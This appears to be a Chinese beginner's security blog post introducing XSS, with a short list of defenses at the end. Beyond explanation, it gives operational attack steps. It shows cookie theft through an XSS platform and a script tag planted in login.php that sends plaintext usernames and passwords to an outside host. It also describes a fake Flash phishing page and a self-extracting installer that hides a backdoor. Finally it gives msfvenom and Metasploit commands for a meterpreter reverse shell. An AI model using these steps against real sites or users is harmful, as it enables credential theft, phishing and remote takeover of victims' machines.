OWASP TOP10漏洞——XSS入门级理解,小白也能一看就会

目录

直接上案例!

1、在一个输入框中输入js语句

2、利用XSS获取cookie登录

XSS产生的原因:

XSS的种类

利用

权限维持

获取明文且发送代码

get.php

FLASH钓鱼页面

伪造安装包

1、选择自解压

2、解压路径

3、后门运行

防护


记录学习记录成长

    XSS(Cross Site Scripting)即跨站脚本

如果直接拿文字看定义相必是难以理解

直接上案例!

1、在一个输入框中输入js语句

如果出现此提示那么就说明存在XSS漏洞,这也是较基础的check方法

2、利用XSS获取cookie登录

需要利用到XSS平台或者BEEF

现在已知一个页面存在XSS漏洞

我们进入XSS平台复制任意一个代码

 然后将代码粘贴到可以存进去的地方

 这样当管理员查看用户页面的时候这个语句就会暗地里自动执行

 然后这个时候我们的XSS平台也已经实时地获取了相关信息

如果该网站对cookie没有设置过多的防御我们就可利用cookie登录了

cookie的填入可以是hackbar也可以是burpsuite修改cookie

现在你应该大概知道XSS是个什么东西了,

能做的还是很多的,但核心还是js

XSS产生的原因:

在Web 页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中 Web 里面的脚本代码会被执行,攻击者便可以盗取用户信息或其他侵犯用户安全。

XSS的种类

反射型:攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码【危害小】

(eg:输入框输入js代码可执行)

存储型:代码是存储在服务器数据库中的,如在个人信息或发表文章等地方【每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫】

DOM型:向文档对象传入xss代码参数,然后操作文档对象时就会触发xss攻 击【需要构造dom才能进行攻击】

利用

XSS平台和BEEF差不多,都可以实现cookie获取

但是如果cookie无法登陆的时候,就可让表单劫持登场lo

但是前提是你已经有了登录文件的权限,

毕竟这个目的是维持权限

权限维持

每个登录页的验证都是会经过login.php或者别的,

在这个文件中写入

获取明文且发送代码

<script src:="http://www.xiaodi8.com/get.php?user=帐号&pass=密码"></script>:

可将账号密码发送到对应网址的get.php

get.php

然后这个时候再服务器的newfile.txt这里就能获取到信息啦

FLASH钓鱼页面

上github直接下载一个fake flash页面

GitHub - r00tSe7en/Fake-flash.cn: flash.cn钓鱼页(中文+英文)

挂在服务器下

伪造安装包

 把原安装包和后门文件压缩在一起

1、选择自解压

2、解压路径

 

3、后门运行

把这个压缩包命名为flash_install.exe

当然还有要改图标,这个需要用到 restorator

然后服务器linux命令

1、生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xX.xx.xxxx LPORT-6666-f exe
>flash.exe

2、MSF配置监听状态

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set Ihost 0.0.0.0
set Iport 6666
run

然后就是设计好诱惑性页面(诱导其在假的flash页面下载存在后门的flash),坐等鱼儿上钩了 

防护

1、过滤一些危险字符
2、HTTP-only Cookie
3、设置CSP(Content Security Policy)
4、输入内容长度限制,转义等

这个内容我觉得先有个概念就好,后面刷题多了再做总结啦

之后也会分享很多小记录

喜欢请关注1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值